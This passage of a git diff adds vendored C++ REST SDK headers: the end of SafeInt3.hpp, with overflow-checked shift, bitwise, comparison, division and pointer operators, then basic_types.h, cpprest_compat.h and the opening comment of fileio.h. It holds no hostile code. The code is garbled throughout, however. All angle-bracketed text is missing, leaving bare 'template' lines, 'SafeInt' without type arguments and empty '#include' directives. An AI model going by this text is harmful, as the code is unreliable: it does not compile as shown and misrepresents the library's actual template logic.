Left shift assignment + + template + SafeInt& operator<<=(U bits) SAFEINT_NOTHROW + { + ShiftAssert(!IntTraits::isSigned || bits >= 0); + ShiftAssert(bits < (int)IntTraits::bitCount); + + m_int <<= bits; + return *this; + } + + template + SafeInt& operator<<=(SafeInt bits) SAFEINT_NOTHROW + { + ShiftAssert(!IntTraits::isSigned || (U)bits >= 0); + ShiftAssert((U)bits < (int)IntTraits::bitCount); + + m_int <<= (U)bits; + return *this; + } + + // Right shift + template + SafeInt operator>>(U bits) const SAFEINT_NOTHROW + { + ShiftAssert(!IntTraits::isSigned || bits >= 0); + ShiftAssert(bits < (int)IntTraits::bitCount); + + return SafeInt((T)(m_int >> bits)); + } + + template + SafeInt operator>>(SafeInt bits) const SAFEINT_NOTHROW + { + ShiftAssert(!IntTraits::isSigned || (U)bits >= 0); + ShiftAssert(bits < (int)IntTraits::bitCount); + + return SafeInt((T)(m_int >> (U)bits)); + } + + // Right shift assignment + template + SafeInt& operator>>=(U bits) SAFEINT_NOTHROW + { + ShiftAssert(!IntTraits::isSigned || bits >= 0); + ShiftAssert(bits < (int)IntTraits::bitCount); + + m_int >>= bits; + return *this; + } + + template + SafeInt& operator>>=(SafeInt bits) SAFEINT_NOTHROW + { + ShiftAssert(!IntTraits::isSigned || (U)bits >= 0); + ShiftAssert((U)bits < (int)IntTraits::bitCount); + + m_int >>= (U)bits; + return *this; + } + + // Bitwise operators + // This only makes sense if we're dealing with the same type and size + // demand a type T, or something that fits into a type T + + // Bitwise & + SafeInt operator&(SafeInt rhs) const SAFEINT_NOTHROW { return SafeInt(m_int & (T)rhs); } + + template + SafeInt operator&(U rhs) const SAFEINT_NOTHROW + { + // we want to avoid setting bits by surprise + // consider the case of lhs = int, value = 0xffffffff + // rhs = char, value = 0xff + // + // programmer intent is to get only the lower 8 bits + // normal behavior is to upcast both sides to an int + // which then sign extends rhs, setting all the bits + + // If you land in the assert, this is because the bitwise operator + // was causing unexpected behavior. Fix is to properly cast your inputs + // so that it works like you meant, not unexpectedly + + return SafeInt(BinaryAndHelper::method>::And(m_int, rhs)); + } + + // Bitwise & assignment + SafeInt& operator&=(SafeInt rhs) SAFEINT_NOTHROW + { + m_int &= (T)rhs; + return *this; + } + + template + SafeInt& operator&=(U rhs) SAFEINT_NOTHROW + { + m_int = BinaryAndHelper::method>::And(m_int, rhs); + return *this; + } + + template + SafeInt& operator&=(SafeInt rhs) SAFEINT_NOTHROW + { + m_int = BinaryAndHelper::method>::And(m_int, (U)rhs); + return *this; + } + + // XOR + SafeInt operator^(SafeInt rhs) const SAFEINT_NOTHROW { return SafeInt((T)(m_int ^ (T)rhs)); } + + template + SafeInt operator^(U rhs) const SAFEINT_NOTHROW + { + // If you land in the assert, this is because the bitwise operator + // was causing unexpected behavior. Fix is to properly cast your inputs + // so that it works like you meant, not unexpectedly + + return SafeInt(BinaryXorHelper::method>::Xor(m_int, rhs)); + } + + // XOR assignment + SafeInt& operator^=(SafeInt rhs) SAFEINT_NOTHROW + { + m_int ^= (T)rhs; + return *this; + } + + template + SafeInt& operator^=(U rhs) SAFEINT_NOTHROW + { + m_int = BinaryXorHelper::method>::Xor(m_int, rhs); + return *this; + } + + template + SafeInt& operator^=(SafeInt rhs) SAFEINT_NOTHROW + { + m_int = BinaryXorHelper::method>::Xor(m_int, (U)rhs); + return *this; + } + + // bitwise OR + SafeInt operator|(SafeInt rhs) const SAFEINT_NOTHROW { return SafeInt((T)(m_int | (T)rhs)); } + + template + SafeInt operator|(U rhs) const SAFEINT_NOTHROW + { + return SafeInt(BinaryOrHelper::method>::Or(m_int, rhs)); + } + + // bitwise OR assignment + SafeInt& operator|=(SafeInt rhs) SAFEINT_NOTHROW + { + m_int |= (T)rhs; + return *this; + } + + template + SafeInt& operator|=(U rhs) SAFEINT_NOTHROW + { + m_int = BinaryOrHelper::method>::Or(m_int, rhs); + return *this; + } + + template + SafeInt& operator|=(SafeInt rhs) SAFEINT_NOTHROW + { + m_int = BinaryOrHelper::method>::Or(m_int, (U)rhs); + return *this; + } + + // Miscellaneous helper functions + SafeInt Min(SafeInt test, const T floor = IntTraits::minInt) const SAFEINT_NOTHROW + { + T tmp = test < m_int ? (T)test : m_int; + return tmp < floor ? floor : tmp; + } + + SafeInt Max(SafeInt test, const T upper = IntTraits::maxInt) const SAFEINT_NOTHROW + { + T tmp = test > m_int ? (T)test : m_int; + return tmp > upper ? upper : tmp; + } + + void Swap(SafeInt& with) SAFEINT_NOTHROW + { + T temp(m_int); + m_int = with.m_int; + with.m_int = temp; + } + + static SafeInt SafeAtoI(const char* input) SAFEINT_CPP_THROW { return SafeTtoI(input); } + + static SafeInt SafeWtoI(const wchar_t* input) { return SafeTtoI(input); } + + enum alignBits + { + align2 = 1, + align4 = 2, + align8 = 3, + align16 = 4, + align32 = 5, + align64 = 6, + align128 = 7, + align256 = 8 + }; + + template + const SafeInt& Align() SAFEINT_CPP_THROW + { + // Zero is always aligned + if (m_int == 0) return *this; + + // We don't support aligning negative numbers at this time + // Can't align unsigned numbers on bitCount (e.g., 8 bits = 256, unsigned char max = 255) + // or signed numbers on bitCount-1 (e.g., 7 bits = 128, signed char max = 127). + // Also makes no sense to try to align on negative or no bits. + + ShiftAssert(((IntTraits::isSigned && bits < (int)IntTraits::bitCount - 1) || + (!IntTraits::isSigned && bits < (int)IntTraits::bitCount)) && + bits >= 0 && (!IntTraits::isSigned || m_int > 0)); + + const T AlignValue = ((T)1 << bits) - 1; + + m_int = (T)((m_int + AlignValue) & ~AlignValue); + + if (m_int <= 0) E::SafeIntOnOverflow(); + + return *this; + } + + // Commonly needed alignments: + const SafeInt& Align2() { return Align(); } + const SafeInt& Align4() { return Align(); } + const SafeInt& Align8() { return Align(); } + const SafeInt& Align16() { return Align(); } + const SafeInt& Align32() { return Align(); } + const SafeInt& Align64() { return Align(); } + +private: + // This is almost certainly not the best optimized version of atoi, + // but it does not display a typical bug where it isn't possible to set MinInt + // and it won't allow you to overflow your integer. + // This is here because it is useful, and it is an example of what + // can be done easily with SafeInt. + template + static SafeInt SafeTtoI(U* input) SAFEINT_CPP_THROW + { + U* tmp = input; + SafeInt s; + bool negative = false; + + // Bad input, or empty string + if (input == nullptr || input[0] == 0) E::SafeIntOnOverflow(); + + switch (*tmp) + { + case '-': + tmp++; + negative = true; + break; + case '+': tmp++; break; + } + + while (*tmp != 0) + { + if (*tmp < '0' || *tmp > '9') break; + + if ((T)s != 0) s *= (T)10; + + if (!negative) + s += (T)(*tmp - '0'); + else + s -= (T)(*tmp - '0'); + + tmp++; + } + + return s; + } + + T m_int; +}; + +// Helper function used to subtract pointers. +// Used to squelch warnings +template +SafeInt SafePtrDiff(const P* p1, const P* p2) SAFEINT_CPP_THROW +{ + return SafeInt(p1 - p2); +} + +// Comparison operators + +// Less than +template +bool operator<(U lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return GreaterThanTest::method>::GreaterThan((T)rhs, lhs); +} + +template +bool operator<(SafeInt lhs, U rhs) SAFEINT_NOTHROW +{ + return GreaterThanTest::method>::GreaterThan(rhs, (T)lhs); +} + +template +bool operator<(SafeInt lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return GreaterThanTest::method>::GreaterThan((T)rhs, (U)lhs); +} + +// Greater than +template +bool operator>(U lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return GreaterThanTest::method>::GreaterThan(lhs, (T)rhs); +} + +template +bool operator>(SafeInt lhs, U rhs) SAFEINT_NOTHROW +{ + return GreaterThanTest::method>::GreaterThan((T)lhs, rhs); +} + +template +bool operator>(SafeInt lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return GreaterThanTest::method>::GreaterThan((T)lhs, (U)rhs); +} + +// Greater than or equal +template +bool operator>=(U lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return !GreaterThanTest::method>::GreaterThan((T)rhs, lhs); +} + +template +bool operator>=(SafeInt lhs, U rhs) SAFEINT_NOTHROW +{ + return !GreaterThanTest::method>::GreaterThan(rhs, (T)lhs); +} + +template +bool operator>=(SafeInt lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return !GreaterThanTest::method>::GreaterThan((U)rhs, (T)lhs); +} + +// Less than or equal +template +bool operator<=(U lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return !GreaterThanTest::method>::GreaterThan(lhs, (T)rhs); +} + +template +bool operator<=(SafeInt lhs, U rhs) SAFEINT_NOTHROW +{ + return !GreaterThanTest::method>::GreaterThan((T)lhs, rhs); +} + +template +bool operator<=(SafeInt lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return !GreaterThanTest::method>::GreaterThan((T)lhs, (U)rhs); +} + +// equality +// explicit overload for bool +template +bool operator==(bool lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return lhs == ((T)rhs == 0 ? false : true); +} + +template +bool operator==(SafeInt lhs, bool rhs) SAFEINT_NOTHROW +{ + return rhs == ((T)lhs == 0 ? false : true); +} + +template +bool operator==(U lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return EqualityTest::method>::IsEquals((T)rhs, lhs); +} + +template +bool operator==(SafeInt lhs, U rhs) SAFEINT_NOTHROW +{ + return EqualityTest::method>::IsEquals((T)lhs, rhs); +} + +template +bool operator==(SafeInt lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return EqualityTest::method>::IsEquals((T)lhs, (U)rhs); +} + +// not equals +template +bool operator!=(U lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return !EqualityTest::method>::IsEquals((T)rhs, lhs); +} + +template +bool operator!=(SafeInt lhs, U rhs) SAFEINT_NOTHROW +{ + return !EqualityTest::method>::IsEquals((T)lhs, rhs); +} + +template +bool operator!=(SafeInt lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return !EqualityTest::method>::IsEquals(lhs, rhs); +} + +template +bool operator!=(bool lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return ((T)rhs == 0 ? false : true) != lhs; +} + +template +bool operator!=(SafeInt lhs, bool rhs) SAFEINT_NOTHROW +{ + return ((T)lhs == 0 ? false : true) != rhs; +} + +template +class ModulusSimpleCaseHelper; + +template +class ModulusSignedCaseHelper; + +template +class ModulusSignedCaseHelper +{ +public: + static bool SignedCase(SafeInt rhs, SafeInt& result) SAFEINT_NOTHROW + { + if ((T)rhs == (T)-1) + { + result = 0; + return true; + } + return false; + } +}; + +template +class ModulusSignedCaseHelper +{ +public: + static bool SignedCase(SafeInt /*rhs*/, SafeInt& /*result*/) SAFEINT_NOTHROW { return false; } +}; + +template +class ModulusSimpleCaseHelper +{ +public: + static bool ModulusSimpleCase(U lhs, SafeInt rhs, SafeInt& result) SAFEINT_CPP_THROW + { + if (rhs != 0) + { + if (ModulusSignedCaseHelper::isSigned>::SignedCase(rhs, result)) return true; + + result = SafeInt((T)(lhs % (T)rhs)); + return true; + } + + E::SafeIntOnDivZero(); + } +}; + +template +class ModulusSimpleCaseHelper +{ +public: + static bool ModulusSimpleCase(U /*lhs*/, SafeInt /*rhs*/, SafeInt& /*result*/) SAFEINT_NOTHROW + { + return false; + } +}; + +// Modulus +template +SafeInt operator%(U lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + // Value of return depends on sign of lhs + // This one may not be safe - bounds check in constructor + // if lhs is negative and rhs is unsigned, this will throw an exception. + + // Fast-track the simple case + // same size and same sign + SafeInt result; + + if (ModulusSimpleCaseHelper < T, + U, + E, + sizeof(T) == sizeof(U) && + (bool)IntTraits::isSigned == (bool)IntTraits::isSigned > ::ModulusSimpleCase(lhs, rhs, result)) + return result; + + return SafeInt((SafeInt(lhs) % (T)rhs)); +} + +// Multiplication +template +SafeInt operator*(U lhs, SafeInt rhs)SAFEINT_CPP_THROW +{ + T ret(0); + MultiplicationHelper::method>::template MultiplyThrow((T)rhs, lhs, ret); + return SafeInt(ret); +} + +template +class DivisionNegativeCornerCaseHelper; + +template +class DivisionNegativeCornerCaseHelper +{ +public: + static bool NegativeCornerCase(U lhs, SafeInt rhs, SafeInt& result) SAFEINT_CPP_THROW + { + // Problem case - normal casting behavior changes meaning + // flip rhs to positive + // any operator casts now do the right thing + U tmp; + + if (CompileConst::Value()) + tmp = lhs / (U)(~(unsigned __int32)(T)rhs + 1); + else + tmp = lhs / (U)(~(unsigned __int64)(T)rhs + 1); + + if (tmp <= (U)IntTraits::maxInt) + { + result = SafeInt((T)(~(unsigned __int64)tmp + 1)); + return true; + } + + // Corner case + T maxT = IntTraits::maxInt; + if (tmp == (U)maxT + 1) + { + T minT = IntTraits::minInt; + result = SafeInt(minT); + return true; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class DivisionNegativeCornerCaseHelper +{ +public: + static bool NegativeCornerCase(U /*lhs*/, SafeInt /*rhs*/, SafeInt& /*result*/) SAFEINT_NOTHROW + { + return false; + } +}; + +template +class DivisionCornerCaseHelper; + +template +class DivisionCornerCaseHelper +{ +public: + static bool DivisionCornerCase1(U lhs, SafeInt rhs, SafeInt& result) SAFEINT_CPP_THROW + { + if ((T)rhs > 0) + { + result = SafeInt(lhs / (T)rhs); + return true; + } + + // Now rhs is either negative, or zero + if ((T)rhs != 0) + { + if (DivisionNegativeCornerCaseHelper < T, + U, + E, + sizeof(U) >= 4 && sizeof(T) <= sizeof(U) > ::NegativeCornerCase(lhs, rhs, result)) + return true; + + result = SafeInt(lhs / (T)rhs); + return true; + } + + E::SafeIntOnDivZero(); + } +}; + +template +class DivisionCornerCaseHelper +{ +public: + static bool DivisionCornerCase1(U /*lhs*/, SafeInt /*rhs*/, SafeInt& /*result*/) SAFEINT_NOTHROW + { + return false; + } +}; + +template +class DivisionCornerCaseHelper2; + +template +class DivisionCornerCaseHelper2 +{ +public: + static bool DivisionCornerCase2(U lhs, SafeInt rhs, SafeInt& result) SAFEINT_CPP_THROW + { + if (lhs == IntTraits::minInt && (T)rhs == -1) + { + // corner case of a corner case - lhs = min int, rhs = -1, + // but rhs is the return type, so in essence, we can return -lhs + // if rhs is a larger type than lhs + // If types are wrong, throws + +#if SAFEINT_COMPILER == VISUAL_STUDIO_COMPILER +#pragma warning(push) +// cast truncates constant value +#pragma warning(disable : 4310) +#endif + + if (CompileConst::Value()) + result = SafeInt((T)(-(T)IntTraits::minInt)); + else + E::SafeIntOnOverflow(); + +#if SAFEINT_COMPILER == VISUAL_STUDIO_COMPILER +#pragma warning(pop) +#endif + + return true; + } + + return false; + } +}; + +template +class DivisionCornerCaseHelper2 +{ +public: + static bool DivisionCornerCase2(U /*lhs*/, SafeInt /*rhs*/, SafeInt& /*result*/) SAFEINT_NOTHROW + { + return false; + } +}; + +// Division +template +SafeInt operator/(U lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + // Corner case - has to be handled seperately + SafeInt result; + if (DivisionCornerCaseHelper::method == (int)DivisionState_UnsignedSigned>:: + DivisionCornerCase1(lhs, rhs, result)) + return result; + + if (DivisionCornerCaseHelper2::isBothSigned>::DivisionCornerCase2(lhs, rhs, result)) + return result; + + // Otherwise normal logic works with addition of bounds check when casting from U->T + U ret; + DivisionHelper::method>::template DivideThrow(lhs, (T)rhs, ret); + return SafeInt(ret); +} + +// Addition +template +SafeInt operator+(U lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + T ret(0); + AdditionHelper::method>::template AdditionThrow((T)rhs, lhs, ret); + return SafeInt(ret); +} + +// Subtraction +template +SafeInt operator-(U lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + T ret(0); + SubtractionHelper::method>::template SubtractThrow(lhs, rhs.Ref(), ret); + + return SafeInt(ret); +} + +// Overrides designed to deal with cases where a SafeInt is assigned out +// to a normal int - this at least makes the last operation safe +// += +template +T& operator+=(T& lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + T ret(0); + AdditionHelper::method>::template AdditionThrow(lhs, (U)rhs, ret); + lhs = ret; + return lhs; +} + +template +T& operator-=(T& lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + T ret(0); + SubtractionHelper::method>::template SubtractThrow(lhs, (U)rhs, ret); + lhs = ret; + return lhs; +} + +template +T& operator*=(T& lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + T ret(0); + MultiplicationHelper::method>::template MultiplyThrow(lhs, (U)rhs, ret); + lhs = ret; + return lhs; +} + +template +T& operator/=(T& lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + T ret(0); + DivisionHelper::method>::template DivideThrow(lhs, (U)rhs, ret); + lhs = ret; + return lhs; +} + +template +T& operator%=(T& lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + T ret(0); + ModulusHelper::method>::template ModulusThrow(lhs, (U)rhs, ret); + lhs = ret; + return lhs; +} + +template +T& operator&=(T& lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + lhs = BinaryAndHelper::method>::And(lhs, (U)rhs); + return lhs; +} + +template +T& operator^=(T& lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + lhs = BinaryXorHelper::method>::Xor(lhs, (U)rhs); + return lhs; +} + +template +T& operator|=(T& lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + lhs = BinaryOrHelper::method>::Or(lhs, (U)rhs); + return lhs; +} + +template +T& operator<<=(T& lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + lhs = (T)(SafeInt(lhs) << (U)rhs); + return lhs; +} + +template +T& operator>>=(T& lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + lhs = (T)(SafeInt(lhs) >> (U)rhs); + return lhs; +} + +// Specific pointer overrides +// Note - this function makes no attempt to ensure +// that the resulting pointer is still in the buffer, only +// that no int overflows happened on the way to getting the new pointer +template +T*& operator+=(T*& lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + // Cast the pointer to a number so we can do arithmetic + SafeInt ptr_val = reinterpret_cast(lhs); + // Check first that rhs is valid for the type of ptrdiff_t + // and that multiplying by sizeof( T ) doesn't overflow a ptrdiff_t + // Next, we need to add 2 SafeInts of different types, so unbox the ptr_diff + // Finally, cast the number back to a pointer of the correct type + lhs = reinterpret_cast((size_t)(ptr_val + (ptrdiff_t)(SafeInt(rhs) * sizeof(T)))); + return lhs; +} + +template +T*& operator-=(T*& lhs, SafeInt rhs) SAFEINT_CPP_THROW +{ + // Cast the pointer to a number so we can do arithmetic + SafeInt ptr_val = reinterpret_cast(lhs); + // See above for comments + lhs = reinterpret_cast((size_t)(ptr_val - (ptrdiff_t)(SafeInt(rhs) * sizeof(T)))); + return lhs; +} + +template +T*& operator*=(T*& lhs, SafeInt) SAFEINT_NOTHROW +{ + // This operator explicitly not supported + C_ASSERT(sizeof(T) == 0); + return (lhs = NULL); +} + +template +T*& operator/=(T*& lhs, SafeInt) SAFEINT_NOTHROW +{ + // This operator explicitly not supported + C_ASSERT(sizeof(T) == 0); + return (lhs = NULL); +} + +template +T*& operator%=(T*& lhs, SafeInt) SAFEINT_NOTHROW +{ + // This operator explicitly not supported + C_ASSERT(sizeof(T) == 0); + return (lhs = NULL); +} + +template +T*& operator&=(T*& lhs, SafeInt) SAFEINT_NOTHROW +{ + // This operator explicitly not supported + C_ASSERT(sizeof(T) == 0); + return (lhs = NULL); +} + +template +T*& operator^=(T*& lhs, SafeInt) SAFEINT_NOTHROW +{ + // This operator explicitly not supported + C_ASSERT(sizeof(T) == 0); + return (lhs = NULL); +} + +template +T*& operator|=(T*& lhs, SafeInt) SAFEINT_NOTHROW +{ + // This operator explicitly not supported + C_ASSERT(sizeof(T) == 0); + return (lhs = NULL); +} + +template +T*& operator<<=(T*& lhs, SafeInt) SAFEINT_NOTHROW +{ + // This operator explicitly not supported + C_ASSERT(sizeof(T) == 0); + return (lhs = NULL); +} + +template +T*& operator>>=(T*& lhs, SafeInt) SAFEINT_NOTHROW +{ + // This operator explicitly not supported + C_ASSERT(sizeof(T) == 0); + return (lhs = NULL); +} + +// Shift operators +// NOTE - shift operators always return the type of the lhs argument + +// Left shift +template +SafeInt operator<<(U lhs, SafeInt bits) SAFEINT_NOTHROW +{ + ShiftAssert(!IntTraits::isSigned || (T)bits >= 0); + ShiftAssert((T)bits < (int)IntTraits::bitCount); + + return SafeInt((U)(lhs << (T)bits)); +} + +// Right shift +template +SafeInt operator>>(U lhs, SafeInt bits) SAFEINT_NOTHROW +{ + ShiftAssert(!IntTraits::isSigned || (T)bits >= 0); + ShiftAssert((T)bits < (int)IntTraits::bitCount); + + return SafeInt((U)(lhs >> (T)bits)); +} + +// Bitwise operators +// This only makes sense if we're dealing with the same type and size +// demand a type T, or something that fits into a type T. + +// Bitwise & +template +SafeInt operator&(U lhs, SafeInt rhs)SAFEINT_NOTHROW +{ + return SafeInt(BinaryAndHelper::method>::And((T)rhs, lhs)); +} + +// Bitwise XOR +template +SafeInt operator^(U lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return SafeInt(BinaryXorHelper::method>::Xor((T)rhs, lhs)); +} + +// Bitwise OR +template +SafeInt operator|(U lhs, SafeInt rhs) SAFEINT_NOTHROW +{ + return SafeInt(BinaryOrHelper::method>::Or((T)rhs, lhs)); +} + +#if SAFEINT_COMPILER == GCC_COMPILER +#pragma GCC diagnostic pop +#endif + +#if SAFEINT_COMPILER == CLANG_COMPILER +#pragma clang diagnostic pop +#endif + +#ifdef C_ASSERT_DEFINED_SAFEINT +#undef C_ASSERT +#undef C_ASSERT_DEFINED_SAFEINT +#endif // C_ASSERT_DEFINED_SAFEINT + +} // namespace safeint3 +} // namespace msl diff --git a/Src/Common/CppRestSdk/include/cpprest/details/basic_types.h b/Src/Common/CppRestSdk/include/cpprest/details/basic_types.h new file mode 100644 index 0000000..59f7876 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/basic_types.h @@ -0,0 +1,131 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Platform-dependent type definitions + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#include "Common/CppRestSdk/include/cpprest/details/cpprest_compat.h" +#include +#include +#include +#include + +#ifndef _WIN32 +#ifndef __STDC_LIMIT_MACROS +#define __STDC_LIMIT_MACROS +#endif +#include +#else +#include +#endif + +#include "Common/CppRestSdk/include/cpprest/details/SafeInt3.hpp" + +namespace utility +{ +#ifdef _WIN32 +#define _UTF16_STRINGS +#endif + +// We should be using a 64-bit size type for most situations that do +// not involve specifying the size of a memory allocation or buffer. +typedef uint64_t size64_t; + +#ifndef _WIN32 +typedef uint32_t HRESULT; // Needed for PPLX +#endif + +#ifdef _UTF16_STRINGS +// +// On Windows, all strings are wide +// +typedef wchar_t char_t; +typedef std::wstring string_t; +#define _XPLATSTR(x) L##x +typedef std::wostringstream ostringstream_t; +typedef std::wofstream ofstream_t; +typedef std::wostream ostream_t; +typedef std::wistream istream_t; +typedef std::wifstream ifstream_t; +typedef std::wistringstream istringstream_t; +typedef std::wstringstream stringstream_t; +#define ucout std::wcout +#define ucin std::wcin +#define ucerr std::wcerr +#else +// +// On POSIX platforms, all strings are narrow +// +typedef char char_t; +typedef std::string string_t; +#define _XPLATSTR(x) x +typedef std::ostringstream ostringstream_t; +typedef std::ofstream ofstream_t; +typedef std::ostream ostream_t; +typedef std::istream istream_t; +typedef std::ifstream ifstream_t; +typedef std::istringstream istringstream_t; +typedef std::stringstream stringstream_t; +#define ucout std::cout +#define ucin std::cin +#define ucerr std::cerr +#endif // endif _UTF16_STRINGS + +#ifndef _TURN_OFF_PLATFORM_STRING +// The 'U' macro can be used to create a string or character literal of the platform type, i.e. utility::char_t. +// If you are using a library causing conflicts with 'U' macro, it can be turned off by defining the macro +// '_TURN_OFF_PLATFORM_STRING' before including the C++ REST SDK header files, and e.g. use '_XPLATSTR' instead. +#define U(x) _XPLATSTR(x) +#endif // !_TURN_OFF_PLATFORM_STRING + +} // namespace utility + +typedef char utf8char; +typedef std::string utf8string; +typedef std::stringstream utf8stringstream; +typedef std::ostringstream utf8ostringstream; +typedef std::ostream utf8ostream; +typedef std::istream utf8istream; +typedef std::istringstream utf8istringstream; + +#ifdef _UTF16_STRINGS +typedef wchar_t utf16char; +typedef std::wstring utf16string; +typedef std::wstringstream utf16stringstream; +typedef std::wostringstream utf16ostringstream; +typedef std::wostream utf16ostream; +typedef std::wistream utf16istream; +typedef std::wistringstream utf16istringstream; +#else +typedef char16_t utf16char; +typedef std::u16string utf16string; +typedef std::basic_stringstream utf16stringstream; +typedef std::basic_ostringstream utf16ostringstream; +typedef std::basic_ostream utf16ostream; +typedef std::basic_istream utf16istream; +typedef std::basic_istringstream utf16istringstream; +#endif + +#if defined(_WIN32) +// Include on everything except Windows Desktop ARM, unless explicitly excluded. +#if !defined(CPPREST_EXCLUDE_WEBSOCKETS) +#if defined(WINAPI_FAMILY) +#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) && defined(_M_ARM) +#define CPPREST_EXCLUDE_WEBSOCKETS +#endif +#else +#if defined(_M_ARM) +#define CPPREST_EXCLUDE_WEBSOCKETS +#endif +#endif +#endif +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/details/cpprest_compat.h b/Src/Common/CppRestSdk/include/cpprest/details/cpprest_compat.h new file mode 100644 index 0000000..880787f --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/cpprest_compat.h @@ -0,0 +1,89 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Standard macros and definitions. + * This header has minimal dependency on windows headers and is safe for use in the public API + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#if defined(_WIN32) + +#if _MSC_VER >= 1900 +#define CPPREST_NOEXCEPT noexcept +#define CPPREST_CONSTEXPR constexpr +#else +#define CPPREST_NOEXCEPT +#define CPPREST_CONSTEXPR const +#endif // _MSC_VER >= 1900 + +#define CASABLANCA_UNREFERENCED_PARAMETER(x) (x) + +#include + +#else // ^^^ _WIN32 ^^^ // vvv !_WIN32 vvv + +#define __declspec(x) __attribute__((x)) +#define dllimport +#define novtable /* no novtable equivalent */ +#define __assume(x) \ + do \ + { \ + if (!(x)) __builtin_unreachable(); \ + } while (false) +#define CASABLANCA_UNREFERENCED_PARAMETER(x) (void)x +#define CPPREST_NOEXCEPT noexcept +#define CPPREST_CONSTEXPR constexpr + +#include +#define _ASSERTE(x) assert(x) + +// No SAL on non Windows platforms +#include "Common/CppRestSdk/include/cpprest/details/nosal.h" + +#if !defined(__cdecl) +#if defined(cdecl) +#define __cdecl __attribute__((cdecl)) +#else // ^^^ defined cdecl ^^^ // vvv !defined cdecl vvv +#define __cdecl +#endif // defined cdecl +#endif // not defined __cdecl + +#if defined(__ANDROID__) +// This is needed to disable the use of __thread inside the boost library. +// Android does not support thread local storage -- if boost is included +// without this macro defined, it will create references to __tls_get_addr +// which (while able to link) will not be available at runtime and prevent +// the .so from loading. +#if not defined BOOST_ASIO_DISABLE_THREAD_KEYWORD_EXTENSION +#define BOOST_ASIO_DISABLE_THREAD_KEYWORD_EXTENSION +#endif // not defined BOOST_ASIO_DISABLE_THREAD_KEYWORD_EXTENSION +#endif // defined(__ANDROID__) + +#ifdef __clang__ +#include +#endif // __clang__ +#endif // _WIN32 + +#ifdef _NO_ASYNCRTIMP +#define _ASYNCRTIMP +#else // ^^^ _NO_ASYNCRTIMP ^^^ // vvv !_NO_ASYNCRTIMP vvv +#ifdef _ASYNCRT_EXPORT +#define _ASYNCRTIMP __declspec(dllexport) +#else // ^^^ _ASYNCRT_EXPORT ^^^ // vvv !_ASYNCRT_EXPORT vvv +#define _ASYNCRTIMP __declspec(dllimport) +#endif // _ASYNCRT_EXPORT +#endif // _NO_ASYNCRTIMP + +#ifdef CASABLANCA_DEPRECATION_NO_WARNINGS +#define CASABLANCA_DEPRECATED(x) +#else +#define CASABLANCA_DEPRECATED(x) __declspec(deprecated(x)) +#endif // CASABLANCA_DEPRECATION_NO_WARNINGS diff --git a/Src/Common/CppRestSdk/include/cpprest/details/fileio.h b/Src/Common/CppRestSdk/include/cpprest/details/fileio.h new file mode 100644 index 0000000..1f379aa --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/fileio.h @@ -0,0 +1,220 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * fileio.h + * + * Asynchronous I/O: stream buffer implementation details + * + * We're going to some lengths to avoid exporting C++ class member functions and implementation details across + * module boundaries, and the factoring requires that we keep the implementation details away from the main header + * files. The supporting functions, which are in this file, use C-like signatures to avoid as many issues as + * possible. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * 